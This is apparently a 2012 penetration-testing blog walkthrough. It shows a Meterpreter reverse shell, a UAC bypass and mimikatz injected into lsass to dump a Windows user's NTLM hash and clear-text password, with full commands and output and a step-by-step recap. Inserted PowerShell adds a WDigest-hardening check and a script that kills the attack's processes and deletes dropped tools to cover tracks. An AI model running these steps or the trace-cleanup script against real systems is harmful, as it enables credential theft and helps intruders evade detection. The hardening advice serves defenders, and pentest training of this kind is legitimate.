Ever have that moment where hashes just aren't good enough? Where you don't have the time or the horsepower to brute force a 15-character NTLM password? Well, if you were able to dump hashes in the first place (local administrator on the box), then you already have the prerequisites to dump the passwords in clear text. Yes… you read that correctly, clear text.

A few days ago I was catching up on my Google Reader feed and ran into this great post on pentestmonkey.net about a tool called mimikatz. … Great blog by the way. I highly recommend it. … It got me thinking, “This technique works great locally, but what would it take to get it working remotely via meterpreter?” And off I went to play.

First, the usual setup, remote meterpreter on a Windows 7 box.

root@EyeHakUNow:~# msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.1.15 E
payload => windows/meterpreter/reverse_tcp
lhost => 192.168.1.15
[*] Started reverse handler on 192.168.1.15:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.14
[*] Meterpreter session 1 opened (192.168.1.15:4444 -> 192.168.1.14:51968) at 2012-02-15 20:42:15 -0500

The first thing I tried was the meterpreter 'execute' command with its -m option, which runs a binary from my side in memory on the remote host without writing it to disk. Unfortunately, mimikatz relies on external files to function (the sekurlsa.dll it injects into lsass, for one), so this failed. A quick fail, but we still have options, one being old-fashioned upload and execute. I uploaded the mimikatz binary and the necessary dependency using the meterpreter 'upload' command…

meterpreter > cd \
meterpreter > mkdir temp
Creating directory: temp
meterpreter > cd temp
meterpreter > upload /root/tools/mimikatz/x64/mimikatz.exe .
[*] uploading  : /root/tools/mimikatz/x64/mimikatz.exe -> .
[*] uploaded   : /root/tools/mimikatz/x64/mimikatz.exe -> .\mimikatz.exe
meterpreter > upload /root/tools/mimikatz/x64/sekurlsa.dll .
[*] uploading  : /root/tools/mimikatz/x64/sekurlsa.dll -> .
[*] uploaded   : /root/tools/mimikatz/x64/sekurlsa.dll -> .\sekurlsa.dll
meterpreter > ls
Listing: C:\temp
================
Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2012-02-15 20:43:11 -0500  .
40777/rwxrwxrwx   0       dir   1980-01-01 00:00:00 -0500  ..
100777/rwxrwxrwx  657392  fil   2012-02-15 20:43:03 -0500  mimikatz.exe
100666/rw-rw-rw-  265200  fil   2012-02-15 20:43:12 -0500  sekurlsa.dll

…dropped to a shell, and executed mimikatz. I was able to access the mimikatz console, but when I tried to inject into the lsass process, I received what appeared to be a permissions error. It was hard to tell, since all of the application's output and documentation are in French. More on this later. One of two things was stopping me: either I didn't have enough privileges, or UAC was getting in the way. I began working my way through the problem by trial and error. The first thing I tried was to get system-level privileges.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

Okay… plan 'B'. UAC must be the issue: even for a local administrator, a non-elevated session runs under UAC's filtered token, which strips the Administrators group and SeDebugPrivilege, so neither getsystem nor an injection into lsass gets anywhere. I ran the 'bypassuac' post module.

meterpreter > run post/windows/escalate/bypassuac
[*] Started reverse handler on 192.168.1.15:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (752128 bytes) to 192.168.1.14
[*] Meterpreter session 2 opened (192.168.1.15:4444 -> 192.168.1.14:51969) at 2012-02-15 20:43:41 -0500
[*] Session ID 2 (192.168.1.15:4444 -> 192.168.1.14:51969) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: pMTllsDttene.exe (2308)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1128
[+] Successfully migrated to process

Awesome, UAC bypassed. I jumped into the new session, dropped to a shell, loaded up the mimikatz console, and attempted the injection again.

meterpreter > background
msf  exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > cd \
meterpreter > cd temp
meterpreter > shell
Process 2444 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\temp>mimikatz
mimikatz
mimikatz 1.0 x64 (alpha)	/* Traitement du Kiwi (Feb  9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 512
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id         : 0;129433
Package d'authentification  : NTLM
Utilisateur principal       : LaNMaSteR
Domaine d'authentification  : WIN-8GLMSQD3GDE
msv1_0 : 	lm{ 00000000000000000000000000000000 }, ntlm{ d6ca08f8c9f57f208b4f746c3cf0d667 }
wdigest : 	reallygoodpassword
tspkg : 	reallygoodpassword
...
mimikatz #

Holy crap! Is that a password in clear text? Yes… it is. In all its glory. (For the non-French readers: mimikatz reported that SeDebugPrivilege was enabled, that the injected DLL connected back from inside lsass, and then listed each logon session's LM/NTLM hashes next to the clear-text copies held by the wdigest and tspkg packages.) Now you can do all of those great things you couldn't do with pass-the-hash… which isn't much, although a clear-text password does get you into anything that only takes a password (RDP, web mail, VPNs) and is worth trying wherever that user has another account. But it's just nice to see the password in clear text, isn't it? I thought so.

To rehash:
1. Get a shell (as a local administrator; the same access you needed to dump hashes).
2. Bypass UAC.
3. Upload binary and dependencies.
4. Enter mimikatz console.
5. Inject into lsass and pull creds.
6. Exit mimikatz console.
7. Clean up files and processes (details below).

Some things to consider...

1. Wdigest seems to be the main culprit here. Windows is keeping the password around to use for wdigest authentication (and the output above shows tspkg holding a copy as well, so it isn't the only package that does). Interesting to think what else may be exploitable here. There very well may be a way to turn this off in the registry or security policy, but I have not explored it to that level yet. More to come perhaps.
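The registry knob does exist, although it came along after this post was written: the UseLogonCredential value under the WDigest provider key, honoured natively from Windows 8.1 / Server 2012 R2 on and backported to Windows 7 / 8 / Server 2008 R2 / 2012 by KB2871997. On those older systems the value has to be created explicitly, because its absence means "keep caching". The script below is an added example, not something from the original post or from mimikatz; the only assumptions are the function names and that it is run from an elevated prompt.

```powershell
# Added example (not from the original post): check and disable WDigest's
# clear-text credential caching in LSASS.
# UseLogonCredential: 0 = do not keep the clear-text password, 1 = keep it
# (the behaviour shown in the mimikatz output above). Absent on Windows 7/2008 R2
# with KB2871997 installed means 1; absent on Windows 8.1/2012 R2+ means 0.

$WDigestKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$WDigestName = 'UseLogonCredential'

function Get-WDigestCaching {
    # Returns 'Enabled', 'Disabled' or 'NotConfigured' (OS default applies)
    $item = Get-ItemProperty -Path $WDigestKey -Name $WDigestName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 'NotConfigured' }
    if ([int]$item.$WDigestName -eq 0) { return 'Disabled' }
    return 'Enabled'
}

function Disable-WDigestCaching {
    # Needs an elevated prompt: the same UAC barrier the walkthrough had to get past.
    if (-not (Test-Path $WDigestKey)) { New-Item -Path $WDigestKey -Force | Out-Null }
    New-ItemProperty -Path $WDigestKey -Name $WDigestName -PropertyType DWord `
        -Value 0 -Force | Out-Null
    # Secrets already cached for existing logon sessions are not purged by this;
    # they disappear when those sessions end, so log everyone off or reboot.
    "Set $WDigestKey\$WDigestName = 0"
}

"WDigest clear-text caching: $(Get-WDigestCaching)"
# Disable-WDigestCaching    # uncomment to apply
```

Two caveats worth keeping in mind: the value only covers wdigest, so tspkg is untouched by it, and an attacker with the access shown in this post can flip it back to 1 just as easily as you set it to 0, which makes that key a good thing to watch for writes.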

2. All of the documentation, and standard/error output of program itself, is in French. I used Google Translate to read the documentation on the site, which was pretty garbled, but worked enough to make sense of the important details. In the comments on one of the author's blog entries, someone asked where the English version was and mentioned that the tool would get more attention if there was an English version. The author replied with something along the lines of, "What makes you think I want more attention?" Hopefully he doesn't mind the world's largest security blog writing about it...

3. Don't forget to clean up after yourself. If you're uploading and executing, you're placing files on the remote filesystem. Make sure you delete them before you leave. Also, the 'bypassuac' post module makes a mess of processes on the remote system. You may want to clean those up before leaving too. The above steps consistently leave the following eight new processes running in addition to the existing ones. Three of them have randomly generated names. It's obvious which ones.

evil.exe
JMjFkkeww.exe
conhost.exe
tior.exe
conhost.exe
cmd.exe
edMTUOe.exe
notepad.exe
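Rather than hunting for those random names by eye, take a snapshot of the process list before the bypassuac/upload steps and kill only what appeared afterwards. The script below is an added example, not part of the original post or of the bypassuac module. It protects its own ancestry (powershell, the cmd.exe from 'shell', and the notepad.exe meterpreter migrated into), because killing any of those drops session 2 before you can exit cleanly. C:\temp and the two mimikatz files come from the walkthrough; the baseline file name and the guess that the bypassuac stager was written to %TEMP% are assumptions, so review what it lists before trusting it.

```powershell
# Added example (not from the original post). Run twice from the shell
# Meterpreter gives you: "-Mode Baseline" before bypassuac, "-Mode Cleanup" last:
#   powershell -ExecutionPolicy Bypass -File C:\temp\cleanup.ps1 -Mode Cleanup
param([ValidateSet('Baseline','Cleanup')][string]$Mode = 'Baseline')

$BaselineFile = 'C:\temp\baseline.csv'   # assumption: where the snapshot is kept

function Save-Baseline {
    Get-Process | Select-Object Id, ProcessName | Export-Csv $BaselineFile -NoTypeInformation
    "Recorded $(@(Import-Csv $BaselineFile).Count) processes"
}

function Get-AncestorPids {
    # This PowerShell, the cmd.exe it was launched from, and the process the
    # Meterpreter session lives in: killing any of these kills the session.
    $ids = @(); $cur = [int]$PID
    while ($cur -gt 0 -and -not ($ids -contains $cur)) {
        $ids += $cur
        $p = Get-WmiObject Win32_Process -Filter "ProcessId=$cur"
        if ($null -eq $p) { break }
        $cur = [int]$p.ParentProcessId
    }
    return $ids
}

function Invoke-Cleanup {
    $before  = Import-Csv $BaselineFile | ForEach-Object { [int]$_.Id }
    $protect = Get-AncestorPids
    $since   = (Get-Item $BaselineFile).CreationTime

    # 1. Processes that were not there at baseline time: evil.exe, tior.exe, the
    #    random-named stagers, their conhost.exe helpers and the extra cmd.exe.
    Get-Process |
        Where-Object { ($before -notcontains $_.Id) -and ($protect -notcontains $_.Id) } |
        ForEach-Object {
            "Killing {0} (PID {1})" -f $_.ProcessName, $_.Id
            Stop-Process -Id $_.Id -Force -ErrorAction SilentlyContinue
        }

    # 2. What we uploaded, plus any .exe written to %TEMP% since the baseline
    #    (assumption: that is where the bypassuac stager was dropped).
    $dropped = @('C:\temp\mimikatz.exe', 'C:\temp\sekurlsa.dll') +
        @(Get-ChildItem $env:TEMP -Filter *.exe |
            Where-Object { $_.CreationTime -gt $since } |
            ForEach-Object { $_.FullName })
    foreach ($f in $dropped) {
        "Removing $f"
        Remove-Item $f -Force -ErrorAction SilentlyContinue
    }
    Remove-Item $BaselineFile -Force -ErrorAction SilentlyContinue
}

if ($Mode -eq 'Baseline') { Save-Baseline } else { Invoke-Cleanup }
```

The one process it deliberately leaves behind is the one your session is running in; kill that last, from msfconsole, with sessions -k once you are done, and remove cleanup.ps1 itself along with the C:\temp directory.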

4. Mimikatz comes packaged with psexec and works quite well with it. The downside is, you need to have credentials to use psexec in the first place.

5. Wouldn't something like this make a great post module? Calling all Ruby devs!!!

As always, enjoy! And join me for the following events!
Boston, MA - SANS Security 542: Web App Penetration Testing and Ethical Hacking beginning May 7th.
Toledo, OH - SANS Security 560: Network Penetration Testing and Ethical Hacking beginning March 26th!
REGISTER TODAY FOR DISCOUNTS! Up to 50% on SEC560!
